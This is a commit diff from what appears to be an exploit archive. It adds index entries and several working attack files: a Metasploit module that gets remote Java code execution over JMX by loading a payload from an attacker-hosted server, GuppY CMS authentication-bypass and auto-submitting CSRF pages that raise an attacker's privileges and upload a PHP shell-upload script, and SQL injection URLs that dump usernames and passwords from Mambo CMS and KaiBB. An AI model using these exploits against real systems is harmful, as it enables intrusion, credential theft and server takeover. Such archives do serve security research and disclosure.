Update: 2015-02-19
12 new exploits
This commit is contained in:
parent
6ed35e5963
commit
114a2afb81
13 changed files with 888 additions and 0 deletions
12
files.csv
12
files.csv
|
@ -32530,3 +32530,15 @@ id,file,description,date,author,platform,type,port
|
|||
36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 'research_display.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
|
||||
36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
|
||||
36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur Cross Site Scripting Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
|
||||
36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 & 5.00.10 Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80
|
||||
36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80
|
||||
36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer ActiveX Control Buffer Overflow",2015-02-17,metasploit,windows,remote,0
|
||||
36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,metasploit,java,remote,1617
|
||||
36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
|
||||
36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
|
||||
36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
|
||||
36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 SQL Injection and Arbitrary File Upload Vulnerabilities",2011-09-02,KedAns-Dz,php,webapps,0
|
||||
36108,platforms/php/webapps/36108.txt,"Mambo CMS N-Frettir Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
|
||||
36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
|
||||
36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 'calendar.php' Cross Site Scripting Vulnerability",2011-09-02,T0xic,php,webapps,0
|
||||
36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 Remote Buffer Overflow Vulnerability",2011-09-05,KedAns-Dz,windows,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
369
platforms/java/remote/36101.rb
Executable file
369
platforms/java/remote/36101.rb
Executable file
|
@ -0,0 +1,369 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Java::Jmx
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Java::Rmi::Client
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Java JMX Server Insecure Configuration Java Code Execution',
|
||||
'Description' => %q{
|
||||
This module takes advantage a Java JMX interface insecure configuration, which would
|
||||
allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication
|
||||
disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while
|
||||
interfaces with authentication enabled will be vulnerable only if a weak configuration
|
||||
is deployed (allowing to use javax.management.loading.MLet, having a security manager
|
||||
allowing to load a ClassLoader MBean, etc.).
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Braden Thomas', # Attack vector discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf'],
|
||||
['URL', 'http://www.accuvant.com/blog/exploiting-jmx-rmi']
|
||||
],
|
||||
'Platform' => 'java',
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Privileged' => false,
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'WfsDelay' => 10
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Generic (Java Payload)', {} ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'May 22 2013'
|
||||
))
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(1617)
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request.uri =~ /mlet$/
|
||||
jar = "#{rand_text_alpha(8 + rand(8))}.jar"
|
||||
|
||||
mlet = "<HTML><mlet code=\"metasploit.JMXPayload\" "
|
||||
mlet << "archive=\"#{jar}\" "
|
||||
mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" "
|
||||
mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
|
||||
send_response(cli, mlet,
|
||||
{
|
||||
'Content-Type' => 'application/octet-stream',
|
||||
'Pragma' => 'no-cache'
|
||||
})
|
||||
|
||||
print_status("Replied to request for mlet")
|
||||
elsif request.uri =~ /\.jar$/i
|
||||
p = regenerate_payload(cli)
|
||||
jar = p.encoded_jar
|
||||
paths = [
|
||||
["metasploit", "JMXPayloadMBean.class"],
|
||||
["metasploit", "JMXPayload.class"],
|
||||
]
|
||||
jar.add_files(paths, [ Msf::Config.data_directory, "java" ])
|
||||
|
||||
send_response(cli, jar.pack,
|
||||
{
|
||||
'Content-Type' => 'application/java-archive',
|
||||
'Pragma' => 'no-cache'
|
||||
})
|
||||
|
||||
print_status("Replied to request for payload JAR")
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
|
||||
unless is_rmi?
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
mbean_server = discover_endpoint
|
||||
disconnect
|
||||
if mbean_server.nil?
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
|
||||
unless is_rmi?
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
jmx_endpoint = handshake(mbean_server)
|
||||
disconnect
|
||||
if jmx_endpoint.nil?
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
def exploit
|
||||
@mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
|
||||
connect
|
||||
|
||||
print_status("#{peer} - Sending RMI Header...")
|
||||
unless is_rmi?
|
||||
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Discoverig the JMXRMI endpoint...")
|
||||
mbean_server = discover_endpoint
|
||||
disconnect
|
||||
if mbean_server.nil?
|
||||
fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
|
||||
else
|
||||
print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
|
||||
end
|
||||
|
||||
connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
|
||||
unless is_rmi?
|
||||
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Proceeding with handshake...")
|
||||
jmx_endpoint = handshake(mbean_server)
|
||||
if jmx_endpoint.nil?
|
||||
fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
|
||||
else
|
||||
print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Loading payload...")
|
||||
unless load_payload(jmx_endpoint)
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Executing payload...")
|
||||
invoke_run_stream = invoke_stream(
|
||||
obj_id: jmx_endpoint[:id].chop,
|
||||
object: "#{@mlet}:name=jmxpayload,id=1",
|
||||
method: 'run'
|
||||
)
|
||||
send_call(call_data: invoke_run_stream)
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
def is_rmi?
|
||||
send_header
|
||||
ack = recv_protocol_ack
|
||||
if ack.nil?
|
||||
return false
|
||||
end
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
def discover_endpoint
|
||||
send_call(call_data: discovery_stream)
|
||||
return_data = recv_return
|
||||
|
||||
if return_data.nil?
|
||||
vprint_error("#{peer} - Discovery request didn't answer")
|
||||
return nil
|
||||
end
|
||||
|
||||
answer = extract_object(return_data, 1)
|
||||
|
||||
if answer.nil?
|
||||
vprint_error("#{peer} - Unexpected JMXRMI discovery answer")
|
||||
return nil
|
||||
end
|
||||
|
||||
case answer
|
||||
when 'javax.management.remote.rmi.RMIServerImpl_Stub'
|
||||
mbean_server = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
|
||||
else
|
||||
vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{answer}")
|
||||
return nil
|
||||
end
|
||||
|
||||
mbean_server
|
||||
end
|
||||
|
||||
def handshake(mbean)
|
||||
vprint_status("#{peer} - Sending handshake / authentication...")
|
||||
|
||||
send_call(call_data: handshake_stream(mbean[:id].chop))
|
||||
return_data = recv_return
|
||||
|
||||
if return_data.nil?
|
||||
vprint_error("#{peer} - Failed to send handshake")
|
||||
return nil
|
||||
end
|
||||
|
||||
answer = extract_object(return_data, 1)
|
||||
|
||||
if answer.nil?
|
||||
vprint_error("#{peer} - Unexpected handshake answer")
|
||||
return nil
|
||||
end
|
||||
|
||||
case answer
|
||||
when 'java.lang.SecurityException'
|
||||
vprint_error("#{peer} - JMX end point requires authentication, but it failed")
|
||||
return nil
|
||||
when 'javax.management.remote.rmi.RMIConnectionImpl_Stub'
|
||||
vprint_good("#{peer} - Handshake completed, proceeding...")
|
||||
conn_stub = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
|
||||
else
|
||||
vprint_error("#{peer} - Handshake returned unexpected object #{answer}")
|
||||
return nil
|
||||
end
|
||||
|
||||
conn_stub
|
||||
end
|
||||
|
||||
def load_payload(conn_stub)
|
||||
vprint_status("#{peer} - Getting JMXPayload instance...")
|
||||
get_payload_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: "#{@mlet}:name=jmxpayload,id=1")
|
||||
send_call(call_data: get_payload_instance)
|
||||
return_data = recv_return
|
||||
|
||||
if return_data.nil?
|
||||
vprint_error("#{peer} - The request to getObjectInstance failed")
|
||||
return false
|
||||
end
|
||||
|
||||
answer = extract_object(return_data, 1)
|
||||
|
||||
if answer.nil?
|
||||
vprint_error("#{peer} - Unexpected getObjectInstance answer")
|
||||
return false
|
||||
end
|
||||
|
||||
case answer
|
||||
when 'javax.management.InstanceNotFoundException'
|
||||
vprint_warning("#{peer} - JMXPayload instance not found, trying to load")
|
||||
return load_payload_from_url(conn_stub)
|
||||
when 'javax.management.ObjectInstance'
|
||||
vprint_good("#{peer} - JMXPayload instance found, using it")
|
||||
return true
|
||||
else
|
||||
vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def load_payload_from_url(conn_stub)
|
||||
vprint_status("Starting service...")
|
||||
start_service
|
||||
|
||||
vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...")
|
||||
create_mbean = create_mbean_stream(obj_id: conn_stub[:id].chop, name: 'javax.management.loading.MLet')
|
||||
send_call(call_data: create_mbean)
|
||||
return_data = recv_return
|
||||
|
||||
if return_data.nil?
|
||||
vprint_error("#{peer} - The request to createMBean failed")
|
||||
return false
|
||||
end
|
||||
|
||||
answer = extract_object(return_data, 1)
|
||||
|
||||
if answer.nil?
|
||||
vprint_error("#{peer} - Unexpected createMBean answer")
|
||||
return false
|
||||
end
|
||||
|
||||
case answer
|
||||
when 'javax.management.InstanceAlreadyExistsException'
|
||||
vprint_good("#{peer} - javax.management.loading.MLet already exists")
|
||||
when 'javax.management.ObjectInstance'
|
||||
vprint_good("#{peer} - javax.management.loading.MLet created")
|
||||
when 'java.lang.SecurityException'
|
||||
vprint_error("#{peer} - The provided user hasn't enough privileges")
|
||||
return false
|
||||
else
|
||||
vprint_error("#{peer} - createMBean returned unexpected object #{answer}")
|
||||
return false
|
||||
end
|
||||
|
||||
vprint_status("#{peer} - Getting javax.management.loading.MLet instance...")
|
||||
get_mlet_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: 'DefaultDomain:type=MLet')
|
||||
send_call(call_data: get_mlet_instance)
|
||||
return_data = recv_return
|
||||
|
||||
if return_data.nil?
|
||||
vprint_error("#{peer} - The request to getObjectInstance failed")
|
||||
return false
|
||||
end
|
||||
|
||||
answer = extract_object(return_data, 1)
|
||||
|
||||
if answer.nil?
|
||||
vprint_error("#{peer} - Unexpected getObjectInstance answer")
|
||||
return false
|
||||
end
|
||||
|
||||
case answer
|
||||
when 'javax.management.InstanceAlreadyExistsException'
|
||||
vprint_good("#{peer} - javax.management.loading.MLet already found")
|
||||
when 'javax.management.ObjectInstance'
|
||||
vprint_good("#{peer} - javax.management.loading.MLet instance created")
|
||||
else
|
||||
vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
|
||||
return false
|
||||
end
|
||||
|
||||
vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...")
|
||||
|
||||
invoke_mlet_get_mbean_from_url = invoke_stream(
|
||||
obj_id: conn_stub[:id].chop,
|
||||
object: 'DefaultDomain:type=MLet',
|
||||
method: 'getMBeansFromURL',
|
||||
args: { 'java.lang.String' => "#{get_uri}/mlet" }
|
||||
)
|
||||
send_call(call_data: invoke_mlet_get_mbean_from_url)
|
||||
return_data = recv_return
|
||||
|
||||
vprint_status("Stopping service...")
|
||||
stop_service
|
||||
|
||||
if return_data.nil?
|
||||
vprint_error("#{peer} - The call to getMBeansFromURL failed")
|
||||
return false
|
||||
end
|
||||
|
||||
answer = extract_object(return_data, 3)
|
||||
|
||||
if answer.nil?
|
||||
vprint_error("#{peer} - Unexpected getMBeansFromURL answer")
|
||||
return false
|
||||
end
|
||||
|
||||
case answer
|
||||
when 'javax.management.InstanceAlreadyExistsException'
|
||||
vprint_good("#{peer} - The remote payload was already loaded... okey, using it!")
|
||||
return true
|
||||
when 'javax.management.ObjectInstance'
|
||||
vprint_good("#{peer} - The remote payload has been loaded!")
|
||||
return true
|
||||
else
|
||||
vprint_error("#{peer} - getMBeansFromURL returned unexpected object #{answer}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
end
|
60
platforms/php/webapps/36098.html
Executable file
60
platforms/php/webapps/36098.html
Executable file
|
@ -0,0 +1,60 @@
|
|||
<!--
|
||||
Exploit Title: GuppY CMS 5.0.9 & 5.00.10 Authentication bypass/Change email. Other versions may be vulnerable but weren't tested.
|
||||
Date: 2/17/2015
|
||||
Exploit Author: Brandon Murphy
|
||||
Vendor Homepage: http://freeguppy.org
|
||||
Software Link: Windows-5.00.10 https://www.freeguppy.org/dwnld.php?lng=en&delay=5&pg=255317&li=CeCILL
|
||||
Version: 5.0.9 & 5.00.10
|
||||
Tested on: Windows 7/Firefox & Xubuntu Linux 3.2.0-23-generic
|
||||
Xubuntu - Guppy CMS 5.00.10 VM: http://mediafire.com/download/d85mgobb35mblzb/GUPPY5.0.7z Working on Virtualbox & VMWare Workstation - VM by d1ch4do
|
||||
Username:xubuntu Pass:reverse
|
||||
|
||||
Timeline:
|
||||
12/21/2014 Notified vendor of vulnerability.
|
||||
12/21/2014 Vendor replied requesting information.
|
||||
12/22/2014 Vendor notified of another vulnerability. Supplied both exploits/info.
|
||||
12/23/2014 Vendor replied problem identified. I was told that I would be supplied with corrections when patch is ready.
|
||||
12/23/2014 Acknowledged. Told vendor full disclosure will be released 45 days after patch release.
|
||||
12/29/2014 Vendor releases 5.00.10. Countdown begins.
|
||||
1/1/2015 Vendor notified the vulnerabilities still exist in patched version 5.00.10
|
||||
1/2/2015 Vendor supplied with version 2 exploits.
|
||||
2/17/2015 Public Disclosure. Was delayed due to holiday.
|
||||
|
||||
Exploit Description:
|
||||
This exploit will automatically log you in and change the email to any registered user except for the admin that is installed with the web application.
|
||||
Click on "Become a member" on the target website to insert the appropriate cookies for this to work.
|
||||
Once the exploit takes place proceed to click "Modify" and change the password. To see if the user has some sort of admin privileges go to site.com/admin/ while still logged in. If they do it will say "Vic_username, enter your password:" and login with the password you just changed it to.
|
||||
|
||||
Disclaimer:
|
||||
I cannot be held accountable for anything you do with this exploit. You take responsibility for your own actions. For educational and testing purposes only.
|
||||
-->
|
||||
|
||||
<html>
|
||||
<body bgcolor="#000000">
|
||||
<font face="arial" color="#01DF01" size="5">
|
||||
<center>
|
||||
GuppY CMS 5.0.9 & 5.00.10 Authentication bypass/Change email. Other versions may be vulnerable but weren't tested.<br>
|
||||
Stable with Firefox 34.0.5. Other browsers may be unstable or may not work.<br><br><br>
|
||||
Thanks: Fred, d1ch4do, & to all of the people who don't believe in me.<br>
|
||||
<a href="https://linkedin.com/in/brandonm86">My LinkedIn</a><br>-----------------------------------------------------------------------------------</font>
|
||||
<body>
|
||||
<form action="http://website.com/user.php?lng=en" method="POST"> <!-- Change this action to http://website.com/user.php?lng=en&uuser=new to work with 5.00.10. -->
|
||||
<input type="hidden" name="token" value="131095497e5f9d22882.83937400"/> <!-- Click on become a member. View the source then search for "token" and replace this value. Remove this line to work with 5.00.10 -->
|
||||
<input type="hidden" name="setusercookie" value="1"/>
|
||||
<input type="hidden" name="uuser" value="update"/> <!-- Wet paint. Don't touch! -->
|
||||
<input type="hidden" name="code_pseudo" value=""/>
|
||||
<input type="text" name="upseudo" value="Vic Username"/><br><br> <!-- User to login as. Can be any registered user with(out) special privileges. -->
|
||||
<input type="text" name="uuid" value="Password"/><br><br> <!-- Anything you like as you will change the password to what you want after the exploit succeeds. -->
|
||||
<input type="text" name="uuid2" value="Verify Password"/><br><br>
|
||||
<input type="text" name="uemail" value="Your Email"/><br><br><br> <!-- Email will be changed to the one you provide. -->
|
||||
<input type="hidden" name="uwebsite" value="http://"/>
|
||||
<input type="hidden" name="usign" value=""/>
|
||||
<input type="hidden" name="uimgsign" value="http://"/>
|
||||
<input type="hidden" name="ulang" value="en"/>
|
||||
<input type="hidden" name="udesign" value=""/>
|
||||
<input type="hidden" name="uboxes" value="LR"/>
|
||||
<input type="hidden" name="uextavatar" value="http://"/>
|
||||
<input type="submit" value="Enjoy the ride!"/></center>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
80
platforms/php/webapps/36099.html
Executable file
80
platforms/php/webapps/36099.html
Executable file
|
@ -0,0 +1,80 @@
|
|||
<!--
|
||||
Exploit Title: GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities-Privilege escalation/File upload. Other versions may be vulnerable but weren't tested.
|
||||
Date: 2/17/2015
|
||||
Exploit Author: Brandon Murphy
|
||||
Vendor Homepage: http://freeguppy.org
|
||||
Software Link: Windows-5.00.10 https://www.freeguppy.org/dwnld.php?lng=en&delay=5&pg=255317&li=CeCILL
|
||||
Version: 5.0.9 & 5.00.10
|
||||
Tested on: Windows 7/Firefox & Xubuntu Linux 3.2.0-23-generic
|
||||
Xubuntu - Guppy CMS 5.00.10 VM: http://mediafire.com/download/d85mgobb35mblzb/GUPPY5.0.7z Working on Virtualbox & VMWare Workstation - VM by d1ch4do
|
||||
Username:xubuntu Pass:reverse
|
||||
|
||||
Timeline:
|
||||
12/21/2014 Notified vendor of vulnerability.
|
||||
12/21/2014 Vendor replied requesting information.
|
||||
12/22/2014 Vendor notified of another vulnerability. Supplied both exploits/info.
|
||||
12/23/2014 Vendor replied problem identified. I was told that I would be supplied with corrections when patch is ready.
|
||||
12/23/2014 Acknowledged. Told vendor full disclosure will be released 45 days after patch release.
|
||||
12/29/2014 Vendor releases 5.00.10. Countdown begins.
|
||||
1/1/2015 Vendor notified the vulnerabilities still exist in patched version 5.00.10
|
||||
1/2/2015 Vendor supplied with version 2 exploits.
|
||||
2/17/2015 Public Disclosure. Was delayed due to holiday.
|
||||
|
||||
Exploit Description:
|
||||
Stable with Firefox 34.0.5. Other browsers may be unstable or may not work. When an authenticated admin is exposed to the code below it will do a couple things. "CSRF 1" allows a registered user to escalate their privileges to Collaborator Admin with access to the "files" plugin. This will allow the attacker to upload a php shell to compromise the server. Once executed the attacker would log into the website as normal then proceed to site.com/admin where it greets them with "AttackerName, enter your password :" and login with the same password you registered with. Hover over "General Management" and then click "Files" where the you can upload a shell of your choosing.
|
||||
|
||||
"CSRF 2" As stated earlier the admin has to be authenticated for this to work. However, the attacker doesn't need an account for "CSRF 2" to work. If the attacker does have an account "CSRF 1" and "CSRF 2" are both automatically executed when the page is loaded giving them 2 ways in. All that is needed on the attacker's end is to go to site.com/file/up.php, upload your shell and access it at site.com/file/shell_name.php The admin must have access to the "files" plugin.
|
||||
|
||||
Thanks: Fred, d1ch4do, & to all of the people who don't believe in me.
|
||||
|
||||
My LinkedIn: https://linkedin.com/in/brandonm86
|
||||
|
||||
Disclaimer:
|
||||
I cannot be held accountable for anything you do with this exploit. You take responsibility for your own actions. For educational and testing purposes only.
|
||||
-->
|
||||
|
||||
<!-- CSRF 1 start - Escalate attacker privileges to Collaborator Admin with the ability to upload unrestricted files (A shell). -->
|
||||
<html>
|
||||
<body onload="document.forms[0].submit(); redirect(); submitRequest()">
|
||||
<form action="http://site.com/admin/admin.php?lng=en&pg=attribdroits" method="POST">
|
||||
<input type="hidden" name="namedroits" value="TestUser"/> <!-- Attacker user name. You must register this user first! -->
|
||||
<input type="hidden" name="etape" value="3"/>
|
||||
<input type="hidden" name="drtuser38" value="5f4dcc3b5aa765d61d8327deb882cf99"/> <!-- Attacker password md5 hash. -->
|
||||
<input type="hidden" name="drtuser42" value="admin"/> <!-- Your rights to be granted. Leave me alone! -->
|
||||
<input type="hidden" name="drtuser30" value=""/>
|
||||
<input type="hidden" name="drtuser36" value="on"/>
|
||||
<input type="hidden" name="listplug" value="files"/> <!-- The plugin you will grant yourself access to. -->
|
||||
</form>
|
||||
<script>
|
||||
function redirect(){
|
||||
window.location.href = "http://site.com/index.php"; <!-- Redirect admin to somewhere else after the CSRF takes place or he/she would know the jig is up. -->
|
||||
}
|
||||
<!-- End CSRF 1 -->
|
||||
<!-- CSRF 2 start - Uploads a small upload script that can then be used to upload your favorite shell. Go to site.com/file/up.php then upload your shell. -->
|
||||
function submitRequest()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://site.com/admin/admin.php?lng=en&pg=upload", true);
|
||||
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------221361792726389");
|
||||
xhr.withCredentials = true;
|
||||
var body = "-----------------------------221361792726389\r\n" +
|
||||
"Content-Disposition: form-data; name=\"rep\"\r\n" +
|
||||
"\r\n" +
|
||||
"file\r\n" +
|
||||
"-----------------------------221361792726389\r\n" +
|
||||
"Content-Disposition: form-data; name=\"ficup\"; filename=\"up.php\"\r\n" + <!-- Name your php upload script here. -->
|
||||
"Content-Type: application/octet-stream\r\n" +
|
||||
"\r\n" +
|
||||
"\x3cform method=\"post\" action=\"\" enctype=\"multipart/form-data\"\x3e\x3cinput type=\"file\" name=\"myfile\"\x3e\x3cinput type=\"submit\" value=\"Upload\"\x3e\x3c/form\x3e\x3c?PHP $dir = \"./\"; $path = $_FILES[\"myfile\"][\"tmp_name\"]; $name = $_FILES[\"myfile\"][\"name\"];if (move_uploaded_file($path, $dir . $name)){print \"file uploaded. You made it\";} else {print \"Error! No hacking today!\";} ?\x3e\r\n" +
|
||||
"-----------------------------221361792726389--\r\n"; <!-- Upload script by d1ch4do -->
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
}
|
||||
</script>
|
||||
<!-- Ending CSRF -->
|
||||
</body>
|
||||
</html>
|
7
platforms/php/webapps/36102.txt
Executable file
7
platforms/php/webapps/36102.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/49418/info
|
||||
|
||||
The Mambo CMS N-Gallery component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/[PATH]/index.php?option=com_n-gallery&Itemid=-0&flokkur=23 union select 0 from mos_users--
|
7
platforms/php/webapps/36103.txt
Executable file
7
platforms/php/webapps/36103.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/49419/info
|
||||
|
||||
The Mambo CMS AHS Shop component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/[PATH]/index.php?option=com_ahsshop&flokkur=-294 union select 0,username,password,3,4,5,6,7,8,9 from mos_users
|
7
platforms/php/webapps/36106.txt
Executable file
7
platforms/php/webapps/36106.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/49420/info
|
||||
|
||||
The Mambo CMS N-Press component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/[PATH]/index.php?option=com_n-press&press=10 union select 0,username,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from mos_users
|
37
platforms/php/webapps/36107.txt
Executable file
37
platforms/php/webapps/36107.txt
Executable file
|
@ -0,0 +1,37 @@
|
|||
source: http://www.securityfocus.com/bid/49421/info
|
||||
|
||||
KaiBB is prone to multiple SQL-injection vulnerabilities and a arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
KaiBB 2.0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
<+> 1 / * Multiple SQL Inj3cti0n :
|
||||
|
||||
http://127.0.0.1/kaibb/?s=viewtopic&t='
|
||||
http://127.0.0.1/kaibb/?s=viewtopic&t=1'
|
||||
http://[target]/[path]/?s=viewtopic&t=[SQLi]
|
||||
------------------------------------------------
|
||||
http://127.0.0.1/kaibb/?s=viewforum&f='
|
||||
http://127.0.0.1/kaibb/?s=viewforum&f=1'
|
||||
http://[target]/[path]/?s=viewforum&f=[SQLi]
|
||||
------------------------------------------------
|
||||
http://127.0.0.1/kaibb/?s=profile&user='
|
||||
http://127.0.0.1/kaibb/?s=profile&user=2'
|
||||
http://[target]/[path]/?s=profile&user=[SQLi]
|
||||
------------------------------------------------
|
||||
http://127.0.0.1/kaibb/?s=search&mode=search&term=&page='
|
||||
http://127.0.0.1/kaibb/?s=search&mode=search&term=&page=1'
|
||||
http://[target]/[path]/?s=search&mode=search&term=&page=1'[SQLi]
|
||||
------------------------------------------------
|
||||
|
||||
<+> 2 / * File|Sh3lL Upload :
|
||||
|
||||
http://127.0.0.1/kaibb/?s=ucp&mode=avatar
|
||||
|
||||
+ After register go t0 :
|
||||
http://[target]/[path]/?s=ucp&mode=avatar
|
||||
+ Upload Sh3ll.php.gif ....
|
||||
- Find him on : http://127.0.0.1/kaibb/img/avatars/{UserID}.gif
|
||||
fr0m eXample : {UserID} = 2 :
|
||||
+ http://127.0.0.1/kaibb/img/avatars/2.gif
|
7
platforms/php/webapps/36108.txt
Executable file
7
platforms/php/webapps/36108.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/49422/info
|
||||
|
||||
The Mambo CMS N-Frettir component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/[PATH]/index.php?option=com_n-frettir&do=view&Itemid=81&id=-54 union select 0,username,2,password,4,5,6,7,8,9,10 from mos_users
|
7
platforms/php/webapps/36109.txt
Executable file
7
platforms/php/webapps/36109.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/49424/info
|
||||
|
||||
The Mambo CMS N-Myndir component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/[PATH]/index.php?option=com_n-myndir&flokkur=-16 union select username from mos_users
|
9
platforms/php/webapps/36110.txt
Executable file
9
platforms/php/webapps/36110.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
